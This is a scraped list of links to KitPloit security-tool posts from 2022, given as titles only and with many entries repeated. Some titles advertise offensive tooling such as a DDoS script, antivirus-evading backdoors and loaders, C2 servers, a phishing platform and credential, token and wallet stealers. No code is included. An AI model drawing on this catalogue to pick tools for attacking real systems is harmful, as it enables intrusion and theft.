- [Threatest - Threatest Is A Go Framework For End-To-End Testing Threat Detection Rules](http://www.kitploit.com/2022/10/threatest-threatest-is-go-framework-for.html)
- [Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks](http://www.kitploit.com/2022/10/sandman-ntp-based-backdoor-for-red-team.html)
- [Whids - Open Source EDR For Windows](http://www.kitploit.com/2022/10/whids-open-source-edr-for-windows.html)
- [ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry](http://www.kitploit.com/2022/10/protectmytooling-multi-packer-wrapper.html)
- [Shomon - Shodan Monitoring Integration For TheHive](http://www.kitploit.com/2022/10/shomon-shodan-monitoring-integration.html)
- [Bomber - Scans Software Bill Of Materials (SBOMs) For Security Vulnerabilities](http://www.kitploit.com/2022/10/bomber-scans-software-bill-of-materials.html)
- [Mangle - Tool That Manipulates Aspects Of Compiled Executables (.Exe Or DLL) To Avoid Detection From EDRs](http://www.kitploit.com/2022/10/mangle-tool-that-manipulates-aspects-of.html)
- [Usbsas - Tool And Framework For Securely Reading Untrusted USB Mass Storage Devices](http://www.kitploit.com/2022/10/usbsas-tool-and-framework-for-securely.html)
- [PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking](http://www.kitploit.com/2022/10/partyloud-simple-tool-to-generate-fake.html)
- [MHDDoS - DDoS Attack Script With 56 Methods](http://www.kitploit.com/2022/10/mhddos-ddos-attack-script-with-56.html)
- [JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets](http://www.kitploit.com/2022/10/jsubfinder-searches-webpages-for.html)
- [xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target](http://www.kitploit.com/2022/10/xnlinkfinder-python-tool-used-to.html)
- [PenguinTrace - Tool To Show How Code Runs At The Hardware Level](http://www.kitploit.com/2022/10/penguintrace-tool-to-show-how-code-runs.html)
- [GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints](http://www.kitploit.com/2022/10/godgenesis-python3-based-c2-server-to.html)
- [Matano - The Open-Source Security Lake Platform For AWS](http://www.kitploit.com/2022/10/matano-open-source-security-lake.html)
- [FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness](http://www.kitploit.com/2022/10/fud-uuid-shellcode-another-shellcode.html)
- [Monkey365 - Tool For Security Consultants To Easily Conduct Not Only Microsoft 365, But Also Azure Subscriptions And Azure Active Directory Security Configuration Reviews](http://www.kitploit.com/2022/10/monkey365-tool-for-security-consultants.html)
- [SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering](http://www.kitploit.com/2022/10/stealing-open-source-penetration.html)
- [EvilnoVNC - Ready To Go Phishing Platform](http://www.kitploit.com/2022/10/evilnovnc-ready-to-go-phishing-platform.html)
- [HSTP - Simple Hyper Service Transfer Protocol On Networks](http://www.kitploit.com/2022/10/hstp-simple-hyper-service-transfer.html)
- [AoratosWin - A Tool That Removes Traces Of Executed Applications On Windows OS](http://www.kitploit.com/2022/10/aoratoswin-tool-that-removes-traces-of.html)
- [Arsenal - Recon Tool installer](http://www.kitploit.com/2022/10/arsenal-recon-tool-installer.html)
- [Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind](http://www.kitploit.com/2022/10/parrot-51-security-gnulinux.html)
- [Cloudfox - Automating Situational Awareness For Cloud Penetration Tests](http://www.kitploit.com/2022/10/cloudfox-automating-situational.html)
- [Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API](http://www.kitploit.com/2022/10/java-remote-class-loader-tool-to-send.html)
- [Utkuici - Nessus Automation](http://www.kitploit.com/2022/10/utkuici-nessus-automation.html)
- [Erlik 2 - Vulnerable-Flask-App](http://www.kitploit.com/2022/10/erlik-2-vulnerable-flask-app.html)
- [Bayanay - Python Wardriving Tool](http://www.kitploit.com/2022/10/bayanay-python-wardriving-tool.html)
- [Deadfinder - Find Dead-Links (Broken Links)](http://www.kitploit.com/2022/10/deadfinder-find-dead-links-broken-links.html)
- [Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks](http://www.kitploit.com/2022/09/pmanager-store-and-retrieve-your.html)
- [SpyCast - A Crossplatform mDNS Enumeration Tool](http://www.kitploit.com/2022/09/spycast-crossplatform-mdns-enumeration.html)
- [Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns](http://www.kitploit.com/2022/09/psudohash-password-list-generator-that.html)
- [Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...](http://www.kitploit.com/2022/09/scan4all-vuls-scan-15000pocs-21-kinds.html)
- [pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python](http://www.kitploit.com/2022/09/pyflipper-unoffical-flipper-zero-cli.html)
- [SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation](http://www.kitploit.com/2022/09/sharpnamedpipepth-pass-hash-to-named.html)
- [PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell](http://www.kitploit.com/2022/09/psasyncshell-powershell-asynchronous.html)
- [Pax - CLI Tool For PKCS7 Padding Oracle Attacks](http://www.kitploit.com/2022/09/pax-cli-tool-for-pkcs7-padding-oracle.html)
- [SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities](http://www.kitploit.com/2022/09/scodescanner-stands-for-source-code.html)
- [OSRipper - AV Evading OSX Backdoor And Crypter Framework](http://www.kitploit.com/2022/09/osripper-av-evading-osx-backdoor-and.html)
- [NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy](http://www.kitploit.com/2022/09/nimgetsyscallstub-get-fresh-syscalls.html)
- [Kam1n0 - Assembly Analysis Platform](http://www.kitploit.com/2022/09/kam1n0-assembly-analysis-platform.html)
- [CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints](http://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html)
- [FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering](http://www.kitploit.com/2022/09/fissure-frequency-independent-sdr-based.html)
- [DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution](http://www.kitploit.com/2022/09/deathsleep-poc-implementation-for.html)
- [XLL_Phishing - XLL Phishing Tradecraft](http://www.kitploit.com/2022/09/xllphishing-xll-phishing-tradecraft.html)
- [SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection](http://www.kitploit.com/2022/09/sharpimpersonation-user-impersonation.html)
- [SDomDiscover - A Easy-To-Use Python Tool To Perform DNS Recon](http://www.kitploit.com/2022/09/sdomdiscover-easy-to-use-python-tool-to.html)
- [Pinecone - A WLAN Red Team Framework](http://www.kitploit.com/2022/09/pinecone-wlan-red-team-framework.html)
- [PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines](http://www.kitploit.com/2022/09/persistencesniper-powershell-script.html)
- [Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory](http://www.kitploit.com/2022/09/nim-runpe-nim-implementation-of.html)
- [GraphCrawler - GraphQL Automated Security Testing Toolkit](http://www.kitploit.com/2022/09/graphcrawler-graphql-automated-security.html)
- [Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption](http://www.kitploit.com/2022/09/gohide-tunnel-port-to-port-traffic-over.html)
- [ForceAdmin - Create Infinite UAC Prompts Forcing A User To Run As Admin](http://www.kitploit.com/2022/09/forceadmin-create-infinite-uac-prompts.html)
- [Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods](http://www.kitploit.com/2022/09/coercer-python-script-to-automatically.html)
- [noPac - Exploiting CVE-2021-42278 And CVE-2021-42287 To Impersonate DA From Standard Domain User](http://www.kitploit.com/2022/09/nopac-exploiting-cve-2021-42278-and-cve.html)
- [Aura - Python Source Code Auditing And Static Analysis On A Large Scale](http://www.kitploit.com/2022/09/aura-python-source-code-auditing-and.html)
- [BeatRev - POC For Frustrating/Defeating Malware Analysts](http://www.kitploit.com/2022/09/beatrev-poc-for-frustratingdefeating.html)
- [ApacheTomcatScanner - A Python Script To Scan For Apache Tomcat Server Vulnerabilities](http://www.kitploit.com/2022/09/apachetomcatscanner-python-script-to.html)
- [Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL](http://www.kitploit.com/2022/09/aced-tool-to-parse-and-resolve-single.html)
- [Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security](http://www.kitploit.com/2022/08/awesome-password-cracking-curated-list.html)
- [Autodeauth - A Tool Built To Automatically Deauth Local Networks](http://www.kitploit.com/2022/09/autodeauth-tool-built-to-automatically.html)
- [Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory](http://www.kitploit.com/2022/08/masky-python-library-with-cli-allowing.html)
- [Erlik - Vulnerable Soap Service](http://www.kitploit.com/2022/08/erlik-vulnerable-soap-service.html)
- [Toxssin - An XSS Exploitation Command-Line Interface And Payload Generator](http://www.kitploit.com/2022/08/toxssin-xss-exploitation-command-line.html)
- [Rekono - Execute Full Pentesting Processes Combining Multiple Hacking Tools Automatically](http://www.kitploit.com/2022/08/rekono-execute-full-pentesting.html)
- [ReconPal - Leveraging NLP For Infosec](http://www.kitploit.com/2022/08/reconpal-leveraging-nlp-for-infosec.html)
- [dBmonster - Track WiFi Devices With Their Recieved Signal Strength](http://www.kitploit.com/2022/08/dbmonster-track-wifi-devices-with-their.html)
- [Ox4Shell - Deobfuscate Log4Shell Payloads With Ease](http://www.kitploit.com/2022/08/ox4shell-deobfuscate-log4shell-payloads.html)
- [System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware](http://www.kitploit.com/2022/08/system-informer-free-powerful-multi.html)
- [RPCMon - RPC Monitor Tool Based On Event Tracing For Windows](http://www.kitploit.com/2022/08/rpcmon-rpc-monitor-tool-based-on-event.html)
- [Concealed_Code_Execution - Tools And Technical Write-Ups Describing Attacking Techniques That Rely On Concealing Code Execution On Windows](http://www.kitploit.com/2022/08/concealedcodeexecution-tools-and.html)
- [dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!](http://www.kitploit.com/2022/08/dnsreaper-subdomain-takeover-tool-for.html)
- [PR-DNSd - Passive-Recursive DNS Daemon](http://www.kitploit.com/2022/07/pr-dnsd-passive-recursive-dns-daemon.html)
- [Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/08/kali-linux-20223-penetration-testing.html)
- [Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform](http://www.kitploit.com/2022/08/faraday-community-open-source.html)
- [Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines](http://www.kitploit.com/2022/07/bpflock-ebpf-driven-security-for.html)
- [Laurel - Transform Linux Audit Logs For SIEM Usage](http://www.kitploit.com/2022/07/laurel-transform-linux-audit-logs-for.html)
- [Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing](http://www.kitploit.com/2022/07/pretender-your-mitm-sidekick-for.html)
- [TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool](http://www.kitploit.com/2022/07/terraformgoat-vulnerable-by-design.html)
- [Maldev-For-Dummies - A Workshop About Malware Development](http://www.kitploit.com/2022/07/maldev-for-dummies-workshop-about.html)
- [PR-DNSd - Passive-Recursive DNS Daemon](http://www.kitploit.com/2022/07/pr-dnsd-passive-recursive-dns-daemon.html)
- [SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.](http://www.kitploit.com/2022/08/silenthound-quietly-enumerate-active.html)
- [Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler](http://www.kitploit.com/2022/08/kage-graphical-user-interface-for.html)
- [Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go](http://www.kitploit.com/2022/08/cirrusgo-fast-tool-to-scan-saas-paas.html)
- [Peetch - An eBPF Playground](http://www.kitploit.com/2022/08/peetch-ebpf-playground.html)
- [Pict - Post-Infection Collection Toolkit](http://www.kitploit.com/2022/08/pict-post-infection-collection-toolkit.html)
- [BlackStone - Pentesting Reporting Tool](http://www.kitploit.com/2022/08/blackstone-pentesting-reporting-tool.html)
- [Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io](http://www.kitploit.com/2022/08/smap-drop-in-replacement-for-nmap.html)
- [MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution](http://www.kitploit.com/2022/08/mrkaplan-tool-aimed-to-help-red-teamers.html)
- [Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages](http://www.kitploit.com/2022/08/packj-large-scale-security-analysis.html)
- [Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/08/kali-linux-20223-penetration-testing.html)
- [Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform](http://www.kitploit.com/2022/08/faraday-community-open-source.html)
- [OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents](http://www.kitploit.com/2022/08/offensivevba-code-execution-and-av.html)
- [NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy](http://www.kitploit.com/2022/08/nimgetsyscallstub-get-fresh-syscalls.html)
- [Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities](http://www.kitploit.com/2022/08/chisel-strike-net-xor-encrypted-cobalt.html)
- [RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check](http://www.kitploit.com/2022/08/redguard-c2-front-flow-control-tool-can.html)
- [VLANPWN - VLAN Attacks Toolkit](http://www.kitploit.com/2022/08/vlanpwn-vlan-attacks-toolkit.html)
- [Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic](http://www.kitploit.com/2022/08/hoaxshell-unconventional-windows.html)
- [Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative](http://www.kitploit.com/2022/08/ropr-blazing-fast-multithreaded-rop.html)
- [crAPI - Completely Ridiculous API](http://www.kitploit.com/2022/08/crapi-completely-ridiculous-api.html)
- [crAPI - Completely Ridiculous API](http://www.kitploit.com/2022/08/crapi-completely-ridiculous-api.html)
- [Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative](http://www.kitploit.com/2022/08/ropr-blazing-fast-multithreaded-rop.html)
- [Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic](http://www.kitploit.com/2022/08/hoaxshell-unconventional-windows.html)
- [VLANPWN - VLAN Attacks Toolkit](http://www.kitploit.com/2022/08/vlanpwn-vlan-attacks-toolkit.html)
- [RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check](http://www.kitploit.com/2022/08/redguard-c2-front-flow-control-tool-can.html)
- [Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities](http://www.kitploit.com/2022/08/chisel-strike-net-xor-encrypted-cobalt.html)
- [NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy](http://www.kitploit.com/2022/08/nimgetsyscallstub-get-fresh-syscalls.html)
- [OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents](http://www.kitploit.com/2022/08/offensivevba-code-execution-and-av.html)
- [Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform](http://www.kitploit.com/2022/08/faraday-community-open-source.html)
- [Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform](http://www.kitploit.com/2022/08/faraday-community-open-source.html)
- [Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/08/kali-linux-20223-penetration-testing.html)
- [Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages](http://www.kitploit.com/2022/08/packj-large-scale-security-analysis.html)
- [MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution](http://www.kitploit.com/2022/08/mrkaplan-tool-aimed-to-help-red-teamers.html)
- [Sealighter - Easy ETW Tracing for Security Research](http://www.kitploit.com/2022/06/sealighter-easy-etw-tracing-for.html)
- [EmoCheck - Emotet Detection Tool For Windows OS](http://www.kitploit.com/2022/06/emocheck-emotet-detection-tool-for.html)
- [secureCodeBox (SCB) - Continuous Secure Delivery Out Of The Box](http://www.kitploit.com/2022/06/securecodebox-scb-continuous-secure.html)
- [Nimc2 - A C2 Fully Written In Nim](http://www.kitploit.com/2022/06/nimc2-c2-fully-written-in-nim.html)
- [Jwtear - Modular Command-Line Tool To Parse, Create And Manipulate JWT Tokens For Hackers](http://www.kitploit.com/2022/06/jwtear-modular-command-line-tool-to.html)
- [Gallia - Extendable Pentesting Framework](http://www.kitploit.com/2022/06/gallia-extendable-pentesting-framework.html)
- [SharpWSUS - CSharp tool for lateral movement through WSUS](http://www.kitploit.com/2022/06/sharpwsus-csharp-tool-for-lateral.html)
- [awsEnum - Enumerate AWS Cloud Resources Based On Provided Credential](http://www.kitploit.com/2022/07/awsenum-enumerate-aws-cloud-resources.html)
- [Dlinject - Inject A Shared Library (I.E. Arbitrary Code) Into A Live Linux Process, Without Ptrace](http://www.kitploit.com/2022/07/dlinject-inject-shared-library-ie.html)
- [Microsoft-365-Extractor-Suite - A Set Of PowerShell Scripts That Allow For Complete And Reliable Acquisition Of The Microsoft 365 Unified Audit Log](http://www.kitploit.com/2022/07/microsoft-365-extractor-suite-set-of.html)
- [DeepTraffic - Deep Learning Models For Network Traffic Classification](http://www.kitploit.com/2022/07/deeptraffic-deep-learning-models-for.html)
- [Aiodnsbrute - DNS Asynchronous Brute Force Utility](http://www.kitploit.com/2022/07/aiodnsbrute-dns-asynchronous-brute.html)
- [Cspparse - A Tool To Evaluate Content Security Policies](http://www.kitploit.com/2022/07/cspparse-tool-to-evaluate-content.html)
- [CrackQL - GraphQL Password Brute-Force And Fuzzing Utility](http://www.kitploit.com/2022/07/crackql-graphql-password-brute-force.html)
- [Haxx - Untethered + Unsandboxed Code Execution Haxx As Root On iOS 14 - iOS 14.8.1](http://www.kitploit.com/2022/07/haxx-untethered-unsandboxed-code.html)
- [Pamspy - Credentials Dumper For Linux Using eBPF](http://www.kitploit.com/2022/07/pamspy-credentials-dumper-for-linux.html)
- [Secretflow - A Unified Framework For Privacy-Preserving Data Analysis And Machine Learning](http://www.kitploit.com/2022/07/secretflow-unified-framework-for.html)
- [Tofu - Windows Offline Filesystem Hacking Tool For Linux](http://www.kitploit.com/2022/07/tofu-windows-offline-filesystem-hacking.html)
- [WebView2-Cookie-Stealer - Attacking With WebView2 Applications](http://www.kitploit.com/2022/07/webview2-cookie-stealer-attacking-with.html)
- [Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page](http://www.kitploit.com/2022/07/bypass-url-parser-tool-that-tests-many.html)
- [Trufflehog - Find Credentials All Over The Place](http://www.kitploit.com/2022/07/trufflehog-find-credentials-all-over.html)
- [Dumpscan - Tool To Extract And Dump Secrets From Kernel And Windows Minidump Formats](http://www.kitploit.com/2022/07/dumpscan-tool-to-extract-and-dump.html)
- [Kubeaudit - Tool To Audit Your Kubernetes Clusters Against Common Security Controls](http://www.kitploit.com/2022/07/kubeaudit-tool-to-audit-your-kubernetes.html)
- [Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool](http://www.kitploit.com/2022/07/zenbuster-multi-threaded-url.html)
- [Koh - The Token Stealer](http://www.kitploit.com/2022/07/koh-token-stealer.html)
- [Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io](http://www.kitploit.com/2022/08/smap-drop-in-replacement-for-nmap.html)
- [BlackStone - Pentesting Reporting Tool](http://www.kitploit.com/2022/08/blackstone-pentesting-reporting-tool.html)
- [Pict - Post-Infection Collection Toolkit](http://www.kitploit.com/2022/08/pict-post-infection-collection-toolkit.html)
- [Peetch - An eBPF Playground](http://www.kitploit.com/2022/08/peetch-ebpf-playground.html)
- [Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go](http://www.kitploit.com/2022/08/cirrusgo-fast-tool-to-scan-saas-paas.html)
- [Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler](http://www.kitploit.com/2022/08/kage-graphical-user-interface-for.html)
- [SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.](http://www.kitploit.com/2022/08/silenthound-quietly-enumerate-active.html)
- [PR-DNSd - Passive-Recursive DNS Daemon](http://www.kitploit.com/2022/07/pr-dnsd-passive-recursive-dns-daemon.html)
- [Maldev-For-Dummies - A Workshop About Malware Development](http://www.kitploit.com/2022/07/maldev-for-dummies-workshop-about.html)
- [TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool](http://www.kitploit.com/2022/07/terraformgoat-vulnerable-by-design.html)
- [Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing](http://www.kitploit.com/2022/07/pretender-your-mitm-sidekick-for.html)
- [Laurel - Transform Linux Audit Logs For SIEM Usage](http://www.kitploit.com/2022/07/laurel-transform-linux-audit-logs-for.html)
- [Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines](http://www.kitploit.com/2022/07/bpflock-ebpf-driven-security-for.html)
- [Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)](http://www.kitploit.com/2022/07/doenerium-fully-undetected-grabber.html)
- [modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity](http://www.kitploit.com/2022/07/moddetective-tool-that-chronologizes.html)
- [LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information](http://www.kitploit.com/2022/07/livetargetsfinder-generates-lists-of.html)
- [RESim - Reverse Engineering Software Using A Full System Simulator](http://www.kitploit.com/2022/07/resim-reverse-engineering-software.html)
- [Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses](http://www.kitploit.com/2022/07/cdb-automate-common-chrome-debug.html)
- [Pinecone - A WLAN Red Team Framework](http://www.kitploit.com/2022/07/pinecone-wlan-red-team-framework.html)
- [Trufflehog - Find Credentials All Over The Place](http://www.kitploit.com/2022/07/trufflehog-find-credentials-all-over.html)
- [Dumpscan - Tool To Extract And Dump Secrets From Kernel And Windows Minidump Formats](http://www.kitploit.com/2022/07/dumpscan-tool-to-extract-and-dump.html)
- [Kubeaudit - Tool To Audit Your Kubernetes Clusters Against Common Security Controls](http://www.kitploit.com/2022/07/kubeaudit-tool-to-audit-your-kubernetes.html)
- [Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool](http://www.kitploit.com/2022/07/zenbuster-multi-threaded-url.html)
- [Koh - The Token Stealer](http://www.kitploit.com/2022/07/koh-token-stealer.html)
- [Norimaci - Simple And Lightweight Malware Analysis Sandbox For macOS](http://www.kitploit.com/2022/06/norimaci-simple-and-lightweight-malware.html)
- [Authcov - Web App Authorisation Coverage Scanning](http://www.kitploit.com/2022/06/authcov-web-app-authorisation-coverage.html)
- [Nim-Loader - WIP Shellcode Loader In Nim With EDR Evasion Techniques](http://www.kitploit.com/2022/06/nim-loader-wip-shellcode-loader-in-nim.html)
- [DFSCoerce - PoC For MS-DFSNM Coerce Authentication Using NetrDfsRemoveStdRoot Method](http://www.kitploit.com/2022/06/dfscoerce-poc-for-ms-dfsnm-coerce.html)
- [Scout - Lightweight URL Fuzzer And Spider: Discover A Web Server'S Undisclosed Files, Directories And VHOSTs](http://www.kitploit.com/2022/06/scout-lightweight-url-fuzzer-and-spider.html)
- [Sealighter - Easy ETW Tracing for Security Research](http://www.kitploit.com/2022/06/sealighter-easy-etw-tracing-for.html)
- [EmoCheck - Emotet Detection Tool For Windows OS](http://www.kitploit.com/2022/06/emocheck-emotet-detection-tool-for.html)
- [secureCodeBox (SCB) - Continuous Secure Delivery Out Of The Box](http://www.kitploit.com/2022/06/securecodebox-scb-continuous-secure.html)
- [Nimc2 - A C2 Fully Written In Nim](http://www.kitploit.com/2022/06/nimc2-c2-fully-written-in-nim.html)
- [Jwtear - Modular Command-Line Tool To Parse, Create And Manipulate JWT Tokens For Hackers](http://www.kitploit.com/2022/06/jwtear-modular-command-line-tool-to.html)
- [Gallia - Extendable Pentesting Framework](http://www.kitploit.com/2022/06/gallia-extendable-pentesting-framework.html)
- [SharpWSUS - CSharp tool for lateral movement through WSUS](http://www.kitploit.com/2022/06/sharpwsus-csharp-tool-for-lateral.html)
- [awsEnum - Enumerate AWS Cloud Resources Based On Provided Credential](http://www.kitploit.com/2022/07/awsenum-enumerate-aws-cloud-resources.html)
- [Dlinject - Inject A Shared Library (I.E. Arbitrary Code) Into A Live Linux Process, Without Ptrace](http://www.kitploit.com/2022/07/dlinject-inject-shared-library-ie.html)
- [Microsoft-365-Extractor-Suite - A Set Of PowerShell Scripts That Allow For Complete And Reliable Acquisition Of The Microsoft 365 Unified Audit Log](http://www.kitploit.com/2022/07/microsoft-365-extractor-suite-set-of.html)
- [DeepTraffic - Deep Learning Models For Network Traffic Classification](http://www.kitploit.com/2022/07/deeptraffic-deep-learning-models-for.html)
- [Aiodnsbrute - DNS Asynchronous Brute Force Utility](http://www.kitploit.com/2022/07/aiodnsbrute-dns-asynchronous-brute.html)
- [Cspparse - A Tool To Evaluate Content Security Policies](http://www.kitploit.com/2022/07/cspparse-tool-to-evaluate-content.html)
- [CrackQL - GraphQL Password Brute-Force And Fuzzing Utility](http://www.kitploit.com/2022/07/crackql-graphql-password-brute-force.html)
- [Haxx - Untethered + Unsandboxed Code Execution Haxx As Root On iOS 14 - iOS 14.8.1](http://www.kitploit.com/2022/07/haxx-untethered-unsandboxed-code.html)
- [Pamspy - Credentials Dumper For Linux Using eBPF](http://www.kitploit.com/2022/07/pamspy-credentials-dumper-for-linux.html)
- [Secretflow - A Unified Framework For Privacy-Preserving Data Analysis And Machine Learning](http://www.kitploit.com/2022/07/secretflow-unified-framework-for.html)
- [Tofu - Windows Offline Filesystem Hacking Tool For Linux](http://www.kitploit.com/2022/07/tofu-windows-offline-filesystem-hacking.html)
- [WebView2-Cookie-Stealer - Attacking With WebView2 Applications](http://www.kitploit.com/2022/07/webview2-cookie-stealer-attacking-with.html)
- [Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page](http://www.kitploit.com/2022/07/bypass-url-parser-tool-that-tests-many.html)
- [Koh - The Token Stealer](http://www.kitploit.com/2022/07/koh-token-stealer.html)
- [Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool](http://www.kitploit.com/2022/07/zenbuster-multi-threaded-url.html)
- [Kubeaudit - Tool To Audit Your Kubernetes Clusters Against Common Security Controls](http://www.kitploit.com/2022/07/kubeaudit-tool-to-audit-your-kubernetes.html)
- [Dumpscan - Tool To Extract And Dump Secrets From Kernel And Windows Minidump Formats](http://www.kitploit.com/2022/07/dumpscan-tool-to-extract-and-dump.html)
- [Trufflehog - Find Credentials All Over The Place](http://www.kitploit.com/2022/07/trufflehog-find-credentials-all-over.html)
- [Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page](http://www.kitploit.com/2022/07/bypass-url-parser-tool-that-tests-many.html)
- [WebView2-Cookie-Stealer - Attacking With WebView2 Applications](http://www.kitploit.com/2022/07/webview2-cookie-stealer-attacking-with.html)
- [Tofu - Windows Offline Filesystem Hacking Tool For Linux](http://www.kitploit.com/2022/07/tofu-windows-offline-filesystem-hacking.html)
- [Secretflow - A Unified Framework For Privacy-Preserving Data Analysis And Machine Learning](http://www.kitploit.com/2022/07/secretflow-unified-framework-for.html)
- [Pamspy - Credentials Dumper For Linux Using eBPF](http://www.kitploit.com/2022/07/pamspy-credentials-dumper-for-linux.html)
- [Haxx - Untethered + Unsandboxed Code Execution Haxx As Root On iOS 14 - iOS 14.8.1](http://www.kitploit.com/2022/07/haxx-untethered-unsandboxed-code.html)
- [CrackQL - GraphQL Password Brute-Force And Fuzzing Utility](http://www.kitploit.com/2022/07/crackql-graphql-password-brute-force.html)
- [Cspparse - A Tool To Evaluate Content Security Policies](http://www.kitploit.com/2022/07/cspparse-tool-to-evaluate-content.html)
- [Aiodnsbrute - DNS Asynchronous Brute Force Utility](http://www.kitploit.com/2022/07/aiodnsbrute-dns-asynchronous-brute.html)
- [DeepTraffic - Deep Learning Models For Network Traffic Classification](http://www.kitploit.com/2022/07/deeptraffic-deep-learning-models-for.html)
